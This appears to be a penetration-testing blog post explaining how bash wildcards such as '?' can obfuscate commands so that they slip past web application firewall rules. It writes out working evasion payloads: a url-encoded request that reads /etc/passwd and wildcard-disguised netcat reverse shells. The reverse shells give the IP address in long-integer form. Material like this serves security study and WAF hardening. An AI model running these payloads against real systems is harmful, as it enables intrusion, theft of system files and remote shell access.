Owasp confirmed that “Remote Command Execution” vulnerability in web application is not so rare by giving the first position for the “Injection” in the “OWASP Top 10 application security risks 2017”.
Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.
All modern Web Application Firewall are able to intercept (and even block) RCE attempts, but when it happens in a Linux system, we’ve got an incredible amount of ways to evade a WAF rule set. The biggest friend of a penetration tester is not a dog… its name is “wildcard”. Before starting, I want to show you things that you may not know about bash and wildcards.
Wildcards
Bash standard wildcards (also known as globbing patterns) are used by various command-line utilities to work with multiple files. For more information on standard wildcards, refer to the manual page by typing man 7 glob. Not everyone knows that there are lots of bash syntaxes that enables you to execute system commands by just using the question mark “?”, the forward slash “/”, numbers, and letters. You can even enumerate files and get their contents using the same amount of characters. How? I will give you some examples:
Instead of executing “cat” command, you can use the following syntax: /???/c?t
With this kind of syntax, you could execute basically everything you want. Let’s say that your vulnerable target is behind a Web Application Firewall, and this WAF has a rule that blocks all requests containing /etc/passwd or /bin/ls inside the value of a GET parameter or inside the body in a POST request. If you try to make a request like /?cmd=cat+/etc/passwd it’ll be blocked by the target WAF and your IP will be banned forever and tagged as “yet another f***in’ redteamer”. But you have a secret weapon in your pocket called wildcard. If you are lucky (not so lucky, we’ll see after) the target WAF doesn’t have a “paranoia level” adequate in order to block characters like ? and / inside a query-string. So you can easily make your request (url-encoded) like this:
/?cmd=%2f???%2f??t%20%2f???%2fp??s??
In some cases, you may also encounter errors because /???/??t can be “translated” by the globbing process to /bin/cat but also /dev/net or /etc/apt, etc....
The question mark wildcard represents only one character which can be any character. Thus in case you know a part of a filename but not one letter, then you could use this wildcard. For example ls *.??? would list all files in the current directory that has an extension of 3 characters in length. Thus files having extensions such as .gif , .jpg , .txt would be listed.
Using this wildcard you could execute a reverse shell using netcat. let’s say that you need to execute a reverse shell to 127.0.0.1 at port 1337 (usually nc -e /bin/bash 127.0.0.1 1337), you can do it with a syntax like:
/???/n? -e /???/b?s? 2130706433 1337
Converting the IP Address 127.0.0.1 in “long” format (2130706433), you can avoid using “dot” characters in your HTTP request.
In my kali I need to use nc.traditional instead of nc because of other commands throw error in order to execute /bin/bash after connecting. The payload becomes something like this:
/???/?c.??????????? -e /???/b?s? 2130706433 1996
Following is a little summary of the two commands that we’ve just seen:
Standard: /bin/nc.traditional -e /bin/bash 127.0.0.1 1996 Evasion:/???/?c.??????????? -e /???/b?s? 2130706433 1996 Used chars: / ? n [0-9]
Enumerate files and directories using echo? yes, you can. The echo command could enumerate files and directories on file system using wildcard. For example: echo /*c/*ss* :
But why using wildcard (and in particular the question mark) can evade a WAF rule set? Let’s find out in the next post….